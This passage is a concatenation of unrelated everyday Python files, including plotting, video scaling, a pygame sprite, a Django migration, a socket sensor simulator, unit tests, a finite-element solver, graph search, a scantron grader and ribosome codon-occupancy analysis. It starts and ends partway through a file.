ax1.set_ylabel("Counts", fontsize=30, fontname="Arial")
ax1.legend(loc=2, prop={'size': 22})
ax1.set_ylim(bottom=0)
plt.setp(ax1.spines.values(), linewidth=3) # sets the thickness of the plot box
ax1.tick_params(width=3) #width of the ticks
ax1.tick_params(length=8) # length of the tics
ax1.tick_params(direction='in') # in out or inout
for tick in ax1.get_xticklabels():
tick.set_fontname("Arial")
for tick in ax1.get_yticklabels():
tick.set_fontname("Arial")
plt.tight_layout() # This seems to help keep edges, such as axes labels, from getting cut off
print(filepath[0])
# Figureing out how to split up filename to extract directory and deposit images and code there
splitpath=filepath[0].split('/')
pathh=filepath[0].replace(splitpath[len(splitpath)-1],'')
plt.savefig(pathh + 'profile.pdf')
plt.savefig(pathh + 'profile.png')
plt.show()
varpathh=splitpath[len(splitpath)-1]
varpathh=varpathh.replace('.txt','.ipynb')
print(varpathh)
|
import ffmpeg, re, os
import os.path as path
if __name__ == "__main__":
clip_dir = path.relpath("..\\tripartito\\clips")
clip = path.join(clip_dir, 'set01\\monster_S01E01_SQ0010_SH0010_V001.mp4')
output = path.join(clip_dir, 'shrinkydink.mp4')
(
ffmpeg
.input(clip)
.filter('scale', w=960, h=540)
.output(output)
.run()
) |
import pygame
class Bullet(pygame.sprite.Sprite):
def __init__(self, x, y, direction, bullet_img, SCREEN_WIDTH):
pygame.sprite.Sprite.__init__(self)
self.speed = 10
self.image = bullet_img
self.rect = self.image.get_rect()
self.rect.center = (x, y)
self.direction = direction
self.SCREEN_WIDTH = SCREEN_WIDTH
def update(self, screen_scroll, world, player, bullet_group, enemy_group):
# move bullet
self.rect.x += (self.direction * self.speed) + screen_scroll
# check if bullet has gone off screen
if self.rect.right < 0 or self.rect.left > self.SCREEN_WIDTH:
self.kill()
# check for collision with level
for tile in world.obstacle_list:
if tile[1].colliderect(self.rect):
self.kill()
# check collision with characters
if pygame.sprite.spritecollide(player, bullet_group, False):
if player.is_alive:
player.health -= 5
self.kill()
for enemy in enemy_group:
if pygame.sprite.spritecollide(enemy, bullet_group, False):
if enemy.is_alive:
enemy.health -= 25
self.kill()
|
# Generated by Django 2.0.3 on 2019-07-09 13:46
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('watchlist', '0002_remove_watchlist_date'),
]
operations = [
migrations.AddField(
model_name='watchlist',
name='date',
field=models.CharField(default=django.utils.timezone.now, max_length=32),
preserve_default=False,
),
]
|
import random
from threading import Thread
import datetime
import socket
from errno import EAGAIN, EWOULDBLOCK
from sys import exit
HEADER = 10
IP = socket.gethostbyname(socket.gethostname())
PORT = 5050
main_client = "Sensor"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
now = datetime.datetime.now()
message_list = [""]
# Try to connect to server when program launches
# If server is offline close program
def start_sensor():
try:
client_socket.connect((IP, PORT))
client_socket.setblocking(False)
client = main_client.encode('utf-8')
client_header = f"{len(client):<{HEADER}}".encode('utf-8')
client_socket.send(client_header + client)
except Exception as e:
print(e)
exit()
# Start a thread that listens for messages so our
# input function still works, so we can use a command
# to close the program
Thread(target=listen_for_message, daemon=True).start()
# Welcome message after we have connected
print("\nWelcome to sensor client")
# Looping menu waiting for command to close program
while True:
command = input("Type \"STOP\" to stop client\n"
"Input: ")
if command == "STOP" or command == "stop":
exit()
else:
print("\n[ERROR] wrong command\n")
# This is a function that pretends to be a sensor
# It returns temperatures in slightly different ranges depending
# on the actual time of day we ask, to simulate reality
def get_temperature(data):
try:
if data <= 9:
temp = round(random.uniform(19.8, 20.2), 1)
elif data > 9 and now.hour < 12:
temp = round(random.uniform(20.2, 22.2), 1)
elif data >= 12 and now.hour < 17:
temp = round(random.uniform(21.2, 23.2), 1)
elif data >= 17 and now.hour < 20:
temp = round(random.uniform(20.2, 22.2), 1)
elif data >= 20:
temp = round(random.uniform(19.8, 20.8), 1)
temp = "Temperatur: "+str(temp)+" celsius"
return temp
except Exception:
return "Temperatur: 20.5 celsius"
# This is a function that pretends to be a sensor
# It returns humidity in slightly different ranges depending
# on the actual time of day we ask, to simulate reality
def get_humidity(data):
try:
if data <= 9:
humid = random.randint(30, 40)
elif data > 9 and now.hour < 12:
humid = random.randint(24, 38)
elif data >= 12 and now.hour < 17:
humid = random.randint(20, 30)
elif data >= 17 and now.hour < 20:
humid = random.randint(22, 36)
elif data >= 20:
humid = random.randint(30, 40)
humid = "Luftfuktighet: "+str(humid)+"%"
return humid
except Exception:
return "Luftfuktighet: 30%"
# This function continuously sends messages to server
# and listens for messages from server
def listen_for_message():
while True:
# If there is a message in the list, send it
message = message_list[0]
if message:
message = message.encode('utf-8')
message_header = f"{len(message):<{HEADER}}".encode('utf-8')
client_socket.send(message_header + message)
message_list[0] = ""
try:
while True:
client_header = client_socket.recv(HEADER)
if not len(client_header):
print('Connection closed by the server')
exit()
client_length = int(client_header.decode('utf-8').strip())
client = client_socket.recv(client_length).decode('utf-8')
message_header = client_socket.recv(HEADER)
message_length = int(message_header.decode('utf-8').strip())
message = client_socket.recv(message_length).decode('utf-8')
print(f'{client} > {message}')
# If we get the specific messages we want add them to
# message_list and send it next iteration
if message == "?temperature":
message_list[0] = get_temperature(now.hour)
if message == "?humidity":
message_list[0] = get_humidity(now.hour)
# When there are no incoming data, error is going to be raised
# We are going to check for both, as they can depend on different os,
# and only want to close if both errors hit
# We expecte one error, meaning no incoming data, so continue as normal
except IOError as e:
if e != EAGAIN and e.errno != EWOULDBLOCK:
print('Reading error: {}'.format(str(e)))
exit()
continue
# Something else went wrong
except Exception as e:
print('General: {}'.format(str(e)))
exit()
if __name__ == "__main__":
start_sensor()
|
import os
from application import app
import unittest
import json
class FlaskrTestCase(unittest.TestCase):
def setUp(self):
print "WHAT"
self.app = app.test_client()
self.base_url = '/ams'
self.token = None
print "WHAT EVEN"
def tearDown(self):
pass
def get(self,url,args=None,token=self.token):
print ""
abs_url = self.base_url + url
print "Testing Url: " + abs_url
res = self.app.get(abs_url,data=args,headers=token)
res = res.data
print "Response: " + res
return json.loads(res)
def post(self,url,args=None,token=self.token):
print ""
abs_url = self.base_url + url
print "Testing Url: " + abs_url
res = self.app.post(abs_url,data=args,headers=token)
res = res.data
print "Response: " + res
return json.loads(res)
# Testing Token
def get_token(self,email,password):
res = self.post("/login",dict(email=email,password=password))
return res
def testGet_token(self):
print "ASDF"
# Case I, Invalid Email and Password
res = get_token("","")
assert res.success == False
# Case II, Invalid Email
res = get_token("","SPLUG")
assert res.success == False
# Case III, Invalid Password
res = get_token("phillip@sih.com","")
assert res.success == False
# Case IV, Valid Credentials
res = get_token("phillip@sih.com","SPLUG")
assert res.success == True
self.token = res.token
# Testing Room
def list_rooms(self):
res = self.get("/rooms")
return res
def test_list_rooms(self):
res = list_rooms()
return
def room_detail(self,room_name):
res = self.get("/"+ room_name)
return res
def room_availibity(self,start_date,end_date):
res = self.get("/rooms/available",dict(start_date=start_date,end_date=end_date))
return res
# # Testing Booking
def list_bookings(self):
res = self.get("/bookings")
return res
def get_booking_detail(self,booking_id):
res = self.get("/bookings/"+booking_id)
return res
def get_booking_activity(self,start_date,end_date):
res = self.get("/bookings/activity",dict(start_date=start_date,end_date=end_date))
return res
def create_booking(self,request_dict):
res = self.post("/bookings",request_dict)
return res
def edit_booking(self):
pass
def del_booking(self):
pass
def booking_history(self,room_name):
pass
# # Testing Customer
def list_customers(self):
res = self.get("/customers")
return res
def get_customer_detail(self,customer_id):
res = self.get("/customers/"+customer_id)
return res
def edit_customer(self,customer_id):
pass
def del_customer(self,customer_id):
pass
def create_customer(self,request_dict):
res = self.post("/customers",request_dict)
return res
# # Testing Maintenance
# def list_maintenances(self):
# res = self.get("/maintenances")
# return res
# def edit_maintenance(self,maintenance_id):
# pass
# def del_maintenance(self,maintenance_id):
# pass
# def create_maintenance(self,request_dict):
# res = self.post("/maintenances",request_dict)
# return res
# def maintenance_history(self,room_name):
# pass
if __name__ == '__main__':
unittest.main() |
import tornado.ioloop
import tornado.web
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.write("This is the index context route")
class HelloWorld(tornado.web.RequestHandler):
def get(self):
self.write("Hello World, fellow pythonistas!")
app = tornado.web.Application([
(r"/",IndexHandler),
(r"/helloworld",HelloWorld)
])
app.listen(8080)
tornado.ioloop.IOLoop.current().start() |
from __future__ import print_function, absolute_import, division
from numpy import *
from scipy import linalg
from scipy import sparse
class BuilderAndSolver:
use_sparse_matrices = False
'''ATTENTION!!
this builder and solver assumes elements to be written IN RESIDUAL FORM and hence
solves FOR A CORRECTION Dx'''
def __init__(self, model_part, scheme):
self.scheme = scheme
self.model_part = model_part
self.dofset = set()
self.dirichlet_dof = set()
def SetupDofSet(self):
'''this function shapes the system to be built'''
# start by iterating over all the elements and obtaining the list of
# dofs
aux = set()
for elem in self.model_part.ElementIterators():
unknowns = elem.GetDofList()
for aaa in unknowns:
aux.add(aaa)
self.dofset = sorted(aux)
# for dof in self.dofset:
# print dof.node.Id, " ",dof.variable
# assign an equation id
counter = 0
for dof in self.dofset:
dof.SetEquationId(counter)
counter += 1
if(dof.IsFixed()):
self.dirichlet_dof.add(dof)
def SetupSystem(self, A, dx, b):
ndof = len(self.dofset)
# allocate systme vectors
b = zeros(ndof)
dx = zeros(ndof)
# allocate system matrix
if(self.use_sparse_matrices == False): # dense case
A = zeros((ndof, ndof))
else: # allocate non zeros and transofrm to csr
A = sparse.dok_matrix((ndof, ndof))
for elem in self.model_part.ElementIterators():
# get non zero positions
equation_id = self.scheme.EquationId(elem)
for i in range(0, len(equation_id)):
eq_i = equation_id[i]
for j in range(0, len(equation_id)):
eq_j = equation_id[j]
A[eq_i,
eq_j] = 1.0 # set it to 1 to ensure it is converted well
# problem here is that in converting zero entries are
# discarded
A = A.tocsr()
return [A, dx, b]
# this function sets to
def SetToZero(self, A, dx, b):
ndof = len(self.dofset)
if(self.use_sparse_matrices == False):
# allocating a dense matrix. This should be definitely improved
A = zeros((ndof, ndof))
b = zeros(ndof)
dx = zeros(ndof)
else:
# print A.todense()
A = A.multiply(
0.0) # only way i found to set to zero is to multiply by zero
b = zeros(ndof)
dx = zeros(ndof)
return [A, dx, b]
def ApplyDirichlet(self, A, dx, b):
ndof = A.shape[0]
if(self.use_sparse_matrices == False): #dense matrix!
for dof in self.dirichlet_dof:
fixed_eqn = dof.GetEquationId()
for i in range(0, ndof):
A[fixed_eqn, i] = 0.0
A[i, fixed_eqn] = 0.0
A[fixed_eqn, fixed_eqn] = 1.0
b[fixed_eqn] = 0.0 # note that this is zero since we assume residual form!
else:
# expensive loop: exactly set to 1 the diagonal
# could be done cheaper, but i want to guarantee accuracy
aux = ones(ndof, dtype=bool)
for dof in self.dirichlet_dof:
eq_id = dof.GetEquationId()
aux[eq_id] = False
ij = A.nonzero()
for i, j in zip(ij[0], ij[1]):
if(aux[i] == False or aux[j] == False):
A[i, j] = 0.0
for dof in self.dirichlet_dof:
eq_id = dof.GetEquationId()
A[eq_id, eq_id] = 1.0
b[eq_id] = 0.0
return [A, dx, b]
def Build(self, A, dx, b):
A, dx, b = self.SetToZero(A, dx, b)
for elem in self.model_part.ElementIterators():
# find where to assemble
equation_id = self.scheme.EquationId(elem)
# compute local contribution to the stiffness matrix
[lhs, rhs] = self.scheme.CalculateLocalSystem(elem)
# assembly to the matrix
for i in range(0, len(equation_id)):
eq_i = equation_id[i]
b[eq_i] += rhs[i]
for j in range(0, len(equation_id)):
eq_j = equation_id[j]
A[eq_i, eq_j] += lhs[i, j]
for cond in self.model_part.ConditionIterators():
# find where to assemble
equation_id = self.scheme.EquationId(cond)
# compute local contribution to the stiffness matrix
[lhs, rhs] = self.scheme.CalculateLocalSystem(cond)
# assembly to the matrix
for i in range(0, len(equation_id)):
eq_i = equation_id[i]
b[eq_i] += rhs[i]
for j in range(0, len(equation_id)):
eq_j = equation_id[j]
A[eq_i, eq_j] += lhs[i, j]
return [A, dx, b]
def BuildAndSolve(self, A, dx, b):
A, dx, b = self.Build(A, dx, b)
A, dx, b = self.ApplyDirichlet(A, dx, b)
# print A
if(self.use_sparse_matrices == False):
dx = linalg.solve(A, b)
else:
from scipy.sparse.linalg import spsolve
dx = sparse.linalg.spsolve(A, b)
return [A, dx, b]
|
import warnings
with warnings.catch_warnings():
warnings.filterwarnings("ignore",category=FutureWarning)
import logging
log = logging.getLogger('werkzeug')
import os
import librosa
import numpy as np
import scipy
from os import path
from pydub import AudioSegment
import matplotlib.pyplot as plt
import scipy.signal as sig
datadir = "../src/data/"
musicdir = "../music/"
from tqdm import tqdm
from multiprocessing import Pool
from anistrophicDiffusion import anisotropic_diffusion
import time
# Load song
# perform block of analysis
# push server message
#
#%%
src = os.listdir(musicdir)[0]
start = time.time()
y, sr = librosa.load(musicdir + src)
print(y)
x = input()
#%%
|
#Uses python3
import sys, os
import queue
def bfs(adj, x, q, shortest):
q.append(x)
while len(q):
x = q.pop(0)
for i in adj[x]:
if shortest[i] >= (int)(2e9):
q.append(i)
shortest[i] = shortest[x] + 1
def distance(adj, s, t):
#write your code here
n = len(adj)
q = []
shortest = [(int)(2e9)] * n
shortest[s] = 0
bfs(adj, s, q, shortest)
return shortest[t] if shortest[t] < (int)(2e9) else -1
if __name__ == '__main__':
# sys.stdin = open(os.path.abspath(os.path.dirname(__file__)) + r'\test\01', 'r')
input = sys.stdin.read()
data = list(map(int, input.split()))
n, m = data[0:2]
data = data[2:]
edges = list(zip(data[0:(2 * m):2], data[1:(2 * m):2]))
adj = [[] for _ in range(n)]
for (a, b) in edges:
adj[a - 1].append(b - 1)
adj[b - 1].append(a - 1)
s, t = data[2 * m] - 1, data[2 * m + 1] - 1
print(distance(adj, s, t))
|
from typing import Optional
from unittest import TestCase
from hummingbot.connector.exchange.btc_markets import btc_markets_constants as CONSTANTS
from hummingbot.connector.exchange.btc_markets.btc_markets_order_book import BtcMarketsOrderBook
from hummingbot.core.data_type.common import TradeType
from hummingbot.core.data_type.order_book_message import OrderBookMessage, OrderBookMessageType, OrderBookRow
class TestOrderbook(TestCase):
def test_snapshot_message_from_exchange_websocket(self):
diff_event = {
"snapshot": True,
"snapshotId": 1578512833978000,
"timestamp": '2020-01-08T19:47:13.986Z',
"bids": [
['99.57', '0.55', 1],
['97.62', '3.20', 2],
['97.07', '0.9', 1],
['96.7', '1.9', 1],
['95.8', '7.0', 1]
],
"asks": [
['100', '3.79', 3],
['101', '6.32', 2]
],
"messageType": CONSTANTS.DIFF_EVENT_TYPE
}
diff_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.snapshot_message_from_exchange_websocket(
diff_event, diff_event["timestamp"], {"marketId": "BAT-AUD"}
)
self.assertEqual(diff_message.type, OrderBookMessageType.SNAPSHOT)
self.assertEqual(diff_message.trading_pair, "BAT-AUD")
self.assertEqual(diff_message.update_id, diff_event["snapshotId"])
self.assertEqual(diff_message.bids[0], OrderBookRow(float(diff_event["bids"][0][0]), float(diff_event["bids"][0][1]), update_id=1578512833978000))
self.assertEqual(diff_message.bids[1], OrderBookRow(float(diff_event["bids"][1][0]), float(diff_event["bids"][1][1]), update_id=1578512833978000))
self.assertEqual(diff_message.asks[0], OrderBookRow(float(diff_event["asks"][0][0]), float(diff_event["asks"][0][1]), update_id=1578512833978000))
self.assertEqual(diff_message.bids[1], OrderBookRow(float(diff_event["bids"][1][0]), float(diff_event["bids"][1][1]), update_id=1578512833978000))
self.assertEqual(diff_message.content["snapshotId"], diff_event["snapshotId"])
def test_snapshot_message_from_exchange_rest(self):
diff_event = {
"snapshot": True,
"snapshotId": 1578512833978000,
"timestamp": '2020-01-08T19:47:13.986Z',
"bids": [
['99.57', '0.55', 1],
['97.62', '3.20', 2],
['97.07', '0.9', 1],
['96.7', '1.9', 1],
['95.8', '7.0', 1]
],
"asks": [
['100', '3.79', 3],
['101', '6.32', 2]
],
"messageType": CONSTANTS.DIFF_EVENT_TYPE
}
diff_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.snapshot_message_from_exchange_rest(
diff_event, diff_event["timestamp"], {"marketId": "BAT-AUD"}
)
self.assertEqual(diff_message.type, OrderBookMessageType.SNAPSHOT)
self.assertEqual(diff_message.trading_pair, "BAT-AUD")
self.assertEqual(diff_message.update_id, diff_event["snapshotId"])
self.assertEqual(diff_message.bids[0], OrderBookRow(float(diff_event["bids"][0][0]), float(diff_event["bids"][0][1]), update_id=1578512833978000))
self.assertEqual(diff_message.bids[1], OrderBookRow(float(diff_event["bids"][1][0]), float(diff_event["bids"][1][1]), update_id=1578512833978000))
self.assertEqual(diff_message.asks[0], OrderBookRow(float(diff_event["asks"][0][0]), float(diff_event["asks"][0][1]), update_id=1578512833978000))
self.assertEqual(diff_message.bids[1], OrderBookRow(float(diff_event["bids"][1][0]), float(diff_event["bids"][1][1]), update_id=1578512833978000))
self.assertEqual(diff_message.content["snapshotId"], diff_event["snapshotId"])
def test_diff_message_from_exchange(self):
diff_event = {
"snapshot": True,
"snapshotId": 1578512833978000,
"timestamp": '2020-01-08T19:47:13.986Z',
"bids": [
['99.57', '0.55', 1],
['97.62', '3.20', 2],
['97.07', '0.9', 1],
['96.7', '1.9', 1],
['95.8', '7.0', 1]
],
"asks": [
['100', '3.79', 3],
['101', '6.32', 2]
],
"messageType": CONSTANTS.DIFF_EVENT_TYPE
}
diff_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.diff_message_from_exchange(
diff_event, diff_event["timestamp"], {"marketId": "BAT-AUD"}
)
self.assertEqual(diff_message.type, OrderBookMessageType.DIFF)
self.assertEqual(diff_message.trading_pair, "BAT-AUD")
self.assertEqual(diff_message.update_id, diff_event["snapshotId"])
self.assertEqual(diff_message.bids[0], OrderBookRow(float(diff_event["bids"][0][0]), float(diff_event["bids"][0][1]), update_id=1578512833978000))
self.assertEqual(diff_message.bids[1], OrderBookRow(float(diff_event["bids"][1][0]), float(diff_event["bids"][1][1]), update_id=1578512833978000))
self.assertEqual(diff_message.asks[0], OrderBookRow(float(diff_event["asks"][0][0]), float(diff_event["asks"][0][1]), update_id=1578512833978000))
self.assertEqual(diff_message.bids[1], OrderBookRow(float(diff_event["bids"][1][0]), float(diff_event["bids"][1][1]), update_id=1578512833978000))
self.assertEqual(diff_message.content["snapshotId"], diff_event["snapshotId"])
def test_sell_trade_message_from_exchange(self):
trade_event = {
"marketId": "BAT-AUD",
"timestamp": '2019-04-08T20:54:27.632Z',
"tradeId": 3153171493,
"price": '7370.11',
"volume": '0.10901605',
"side": 'Ask',
"messageType": CONSTANTS.TRADE_EVENT_TYPE
}
trade_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.trade_message_from_exchange(
trade_event, trade_event["timestamp"], {"marketId": "BAT-AUD"}
)
self.assertEqual(trade_message.type, OrderBookMessageType.TRADE)
self.assertEqual(trade_message.trading_pair, "BAT-AUD")
self.assertEqual(trade_message.trade_id, 3153171493)
self.assertEqual(trade_message.content["price"], "7370.11")
self.assertEqual(trade_message.content["amount"], "0.10901605")
self.assertEqual(trade_message.content["trade_type"], float(TradeType.SELL.value))
def test_buy_trade_message_from_exchange(self):
trade_event = {
"marketId": "BAT-AUD",
"timestamp": '2019-04-08T20:54:27.632Z',
"tradeId": 3153171493,
"price": '7370.11',
"volume": '0.10901605',
"side": 'Bid',
"messageType": CONSTANTS.TRADE_EVENT_TYPE
}
trade_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.trade_message_from_exchange(
trade_event, trade_event["timestamp"], {"marketId": "BAT-AUD"}
)
self.assertEqual(trade_message.type, OrderBookMessageType.TRADE)
self.assertEqual(trade_message.trading_pair, "BAT-AUD")
self.assertEqual(trade_message.trade_id, 3153171493)
self.assertEqual(trade_message.content["price"], "7370.11")
self.assertEqual(trade_message.content["amount"], "0.10901605")
self.assertEqual(trade_message.content["trade_type"], float(TradeType.BUY.value))
|
import os
import sys
# Make it run more easily outside of VSCode
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")))
import costreport.data.db_session as db_session
from costreport.data.costcodes import Costcode
def main():
init_db()
while True:
insert_a_costcode()
def insert_a_costcode():
c = Costcode()
c.project_id = input("Project id:").strip().lower()
if len(c.project_id) < 1:
raise ValueError("Value cannot be NULL")
c.costcode = input("Costcode ref:").strip().lower()
if len(c.costcode) < 1:
raise ValueError("Value cannot be NULL")
c.cost_code_description = input("Costcode Description:").strip()
if len(c.cost_code_description) < 1:
raise ValueError("Value cannot be NULL")
session = db_session.create_session()
session.add(c)
session.commit()
def init_db():
top_folder = os.path.dirname(__file__)
rel_file = os.path.join("..", "db", "costreport.sqlite")
db_file = os.path.abspath(os.path.join(top_folder, rel_file))
db_session.global_init(db_file)
if __name__ == "__main__":
main()
|
# -------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Austin
#
# Created: 13/10/2014
# Copyright: (c) Austin 2014
# Licence: <your licence>
# -------------------------------------------------------------------------------
import sys
sys.path.append('/usr/local/lib/python3.4/site-packages')
#workaround for opencv not in pythonpath
import readPDF
from scantron import *
import write_xls
def main():
# inputs
folder = sys.argv[1]#"test_folder2" # folder is the folder where images are written.
xls = True
# STEP 1: read in pdf, split into jpegs
#keyPath = os.path.join(folder, "tests.pdf")
[folder, num_students] = readPDF.process("tests.pdf", folder) # 2nd arg is outfolder
# image names will be key.jpg, 0.jpg, 1.jpg, 2.jpg, etc.
# return_message = "Successfully read PDF"
# print return_message
# STEP 2: read key
file_key = os.path.join(folder, "key.jpg")
print(file_key)
key = read_key(file_key) # establish array of correct values
# STEP 3: loop scanned tests
if xls:
all_answer = []
all_correct = []
all_id = []
all_score = []
for i in range(1000):
file_name = "%d.jpg"%i
full_path = os.path.join(folder, file_name)
print(full_path)
if not os.path.isfile(full_path):
break
score, correct_list, id, answer_list = grade_test(full_path, key, xls)
# return student id and score
if xls:
all_correct.append(correct_list)
all_answer.append(answer_list)
all_id.append(id)
all_score.append(score)
write_xls.write(folder,key, all_id, all_score, all_correct, all_answer)
#return_message = "Successfully graded tests"
#print (return_message)
if __name__ == '__main__':
main()
|
import sys
import os
import argparse
import struct
import math, csv
import numpy as np
riboseqDir = os.path.dirname(os.path.realpath(__file__)) ## add current directory as rootDir
sys.path.append(riboseqDir)
import rphelper as rph
# Workflow to get E, P, A sites occupancy on ribosomes
# density files are riboshifted already.
# Exclusion module implemented
### this is developed by Colin Wu, with a few modifications
class codonoccupancy(object):
"""
Instantiate the class
"""
def __init__(self,sample_name,motifs,seqwin,UTRfilestring,cds5trim,cds3trim,exclusiondict,outfilepath,outlistfile):
self.sample_name = sample_name
self.motifs= motifs
self.seqwin= seqwin
self.UTRfilestring= UTRfilestring
self.cds5trim= cds5trim
self.cds3trim= cds3trim
self.exclusiondict= exclusiondict
self.outfilepath= outfilepath
self.outlistfile= outlistfile
def writerows(self, intable, outfilestring):
fc = open(outfilestring, "w")
writer = csv.writer(fc)
writer.writerows(intable)
fc.close()
def codonaverage(self):
outlist,headers,motiffilelist= [],[],[]
headers.append("motif")
for motif in self.motifs:
motiffile= args.motiffilerootpath+ motif+ "_1.csv"
motiffilelist.append(motiffile)
headers.append(motif)
outlist.append(headers)
codon_occu = []
codon_occu.append(self.sample_name)
f_output= open(args.outfileparams, "w")
f_output.write("Density file is "+str(self.sample_name)+"\n")
f_output.write("cds5trim is "+str(args.cds5trim)+"\n")
f_output.write("cds3trim is "+str(args.cds3trim)+"\n")
f_output.write("Seqwin is "+str(args.seqwin)+"\n")
f_output.write("Motiflist is "+str(motiffilelist)+"\n")
readcountsdict= rph.readcountsf(args.trspdictfilestring)
exclusionmodule= exclusionfiles[0]
if exclusionmodule!= '0':
exclusiondict= self.readindict(open(exclusionmodule,"rU"))
else:
exclusiondict= '0'
print "Exclusion file is "+str(exclusionmodule)
UTRdict= rph.readindict(open(args.UTRfilestring, "rU"))
occupancy= self.occupancy(readcountsdict,motiffilelist,exclusiondict,codon_occu,UTRdict,f_output)
outlist.append(codon_occu)
f_output.close()
co= np.asarray(outlist) # convert outlist to a np.array
output= co.T
# print "output: ", output
# print "self.outlistfile: ", self.outlistfile
self.writerows(output,self.outlistfile) # write these rows to a csv
def occupancy(self,readcountsdict,motiffilelist,exclusiondict,codon_occu,UTRdict,f_output):
"""
This is the workhorse of this function
It is handling the actual density values at the transcript level
"""
for genelist in motiffilelist: # motiffilelist is a list contaning all codons to be analyzed
### genelist is csv file with all transcripts containing a specific codon
f_output.write("Processing "+str(genelist)+"\n")
f_csv= open(genelist,"rU")
pausedict= self.readOrderedDict(f_csv) # read in the dictionary with all occurances of a codon in the genome
count= 0
inputpos= 0
ratio_sum= 0
for trsp in pausedict: # iterate through csv file of codon positions - this is pausedict - ex: hg19_AAA_1.csv
if trsp== "headers": continue # first line should be: 'headers,gene,chrom,trsp_num,cds_pos'
else: trspname= trsp.split("_",1)[0] # example line: 'uc004fop.3,PLCXD1,chrY,0,246' the first line for hg19_AAA_1.csv
if exclusiondict!= '0':
if exclusiondict.has_key(trspname): continue # filter out transcripts present in exclusiondict
if UTRdict.has_key(trspname): # check that transcript is present in UTRdict and set utr5len and cdslen
utr5len= int(UTRdict[trspname][5])
cdslen= int(UTRdict[trspname][4])
else: continue
cdspos= int(pausedict[trsp][3])
mrnapos= cdspos+ utr5len
chrom= pausedict[trsp][1]
featnum= int(pausedict[trsp][2])
inputpos+= 1
if readcountsdict.has_key(trspname): cdscounts= readcountsdict[trspname][utr5len:utr5len+ cdslen]
else: continue
tooclosetostartorstop= 6 # This is arbitrary, set boundaries around start and stop codon as function of seqwin
# at a minimum, do not include any transcript within 2 codons
if cdspos- int(self.seqwin[0])- tooclosetostartorstop < 0 or cdspos+ int(self.seqwin[1])+ tooclosetostartorstop> cdslen: continue # throw out things too close to start or stop, within 2 codons minimum
# set the location of density values to be queried
# with default value of [0,3], window scores three nucleotides within the codon
else: loccounts= cdscounts[cdspos- int(self.seqwin[0]): cdspos+ int(self.seqwin[1])] # this is a 3nt window with default settings
trimmed_cdscounts= cdscounts[int(self.cds5trim):cdslen- int(self.cds3trim)] # remove first N nt's and last nt's of cdscounts
if len(trimmed_cdscounts)== 0 or len(loccounts)== 0: continue
cdsdensity= sum(trimmed_cdscounts)/len(trimmed_cdscounts) # density accross entire transcript
locdensity= sum(loccounts)/len(loccounts) # density at querry location
# only throw away transcripts that have no reads in the cds
if cdsdensity== 0: continue # include ZERO motif density
#if cdsdensity==0 or locdensity==0: continue # exclude ZERO motif density
# calculate codon density ratio relative to that of the transcript
locratio= locdensity/cdsdensity
count+= 1 # record a codon occurence as counted
ratio_sum+= locratio # sum accross all densities in transcriptome, keep running average, this is additive for all occurances of this codon
if count== 0: # for when nothing makes it through all forms of filtering
#print "No genes to average."
occupancy= "No genes to average"
f_output.write("No genes to average"+"\n")
else:
occupancy= ratio_sum/count # average density per occrance of this codon
#print str(count)+" positions averaged. "
f_output.write(str(count)+" positions averaged. Occupancy= "+ str(occupancy)+ "\n")
codon_occu.append(occupancy) # record occupancy for this codon genome wide
def readOrderedDict(self,f):
from collections import OrderedDict
previousgene= ""
counter= 1
filegen= csv.reader(f, delimiter=',')
output= OrderedDict()
for gene in filegen:
if gene[0]== previousgene:
modgenename= gene[0]+"_"+str(counter)
counter+= 1
else:
modgenename= gene[0]
counter= 1
output[modgenename]= []
for element in gene[1:]:
output[modgenename].append(element)
previousgene= gene[0]
return output
def readindict(self,f):
previousgene=""
counter=1
filegen=csv.reader(f,delimiter=',')
output = {}
for gene in filegen:
if gene[0]==previousgene:
modgenename=gene[0]+"_"+str(counter)
counter+=1
else:
modgenename=gene[0]
counter=1
output[modgenename]=[]
for column in gene[1:]:
output[modgenename].append(column)
previousgene=gene[0]
return output
if __name__== '__main__':
parser= argparse.ArgumentParser()
parser.add_argument('--motiffilerootpath', help= 'motiffilerootpath')
parser.add_argument('--motifs', help= 'list of motifs')
parser.add_argument('--trspdictfilestring', help= 'path to density files', required= True)
parser.add_argument('--sample_name', help= 'name of sample being analyzed')
parser.add_argument('--UTRfilestring', help= 'UTRfilestring', required= True)
parser.add_argument('--cds5trim', help= 'trim from 5 end of cds')
parser.add_argument('--cds3trim', help= 'trim from 3 end of cds')
parser.add_argument('--seqwin', help= 'seqwin')
parser.add_argument('--exclusionfiles', help= 'files to exclude transcripts')
parser.add_argument('--outfileparams', help= 'output path for log file')
parser.add_argument('--outlistfile', help= 'outputfile path and file name')
args = parser.parse_args()
print args.motifs
import ast
seqwin= ast.literal_eval(args.seqwin) # convert string to list object
# densityfiles= ast.literal_eval(args.densityfiles) # convert to list
motifs= ast.literal_eval(args.motifs) # convert codons to list
exclusionfiles= ast.literal_eval(args.exclusionfiles)
codonavg= codonoccupancy(args.sample_name,motifs,seqwin,args.UTRfilestring,args.cds5trim,args.cds3trim,exclusionfiles,args.outfileparams,args.outlistfile)
codonavg.codonaverage()
|
import copy
def loadDataSet(FilePath):
fd = open(FilePath, "r", encoding='utf-8')
dataSet = []
prMap = {}
for line in fd:
personName = line.split("\t")[0]
list =line.split("\t")[1]
pr = float(list.split("#")[0])
dataSet.append(personName)
prMap[personName] = pr
return dataSet, prMap
if __name__ == "__main__":
begin = 1
dirPath = "PR/Data"+str(begin)+"/part-r-00000"
dataSet, prMap = loadDataSet(dirPath)
len = dataSet.__len__()
for i in range(len):
maxIndex = i
for j in range(i+1, len):
personName = dataSet[j]
if prMap[dataSet[maxIndex]] < prMap[personName]:
maxIndex = j
strName = dataSet[maxIndex]
dataSet[maxIndex] = dataSet[i]
dataSet[i] = strName
prevSortArray = dataSet
accurate = []
for fileIndex in range(begin+1, 21):
filePath = "PR/Data"+str(fileIndex)+"/part-r-00000"
postDataSet, postPrMap = loadDataSet(filePath)
for i in range(len):
maxIndex = i
for j in range(i+1,len):
personName = postDataSet[j]
